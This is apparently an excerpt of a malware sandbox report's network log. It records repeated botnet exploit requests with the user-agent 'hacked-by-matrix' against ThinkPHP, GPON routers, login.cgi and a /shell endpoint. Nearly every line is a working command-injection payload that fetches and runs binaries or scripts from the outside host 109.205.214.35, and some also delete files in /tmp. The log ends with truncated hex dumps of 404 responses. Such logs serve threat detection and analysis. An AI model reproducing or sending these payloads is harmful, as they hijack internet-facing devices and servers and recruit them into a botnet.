          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wgeData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: hacked-by-matrixAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 994Date: Thu, 21 Mar 2024 04:18:43 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 994Date: Thu, 21 Mar 2024 04:18:43 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 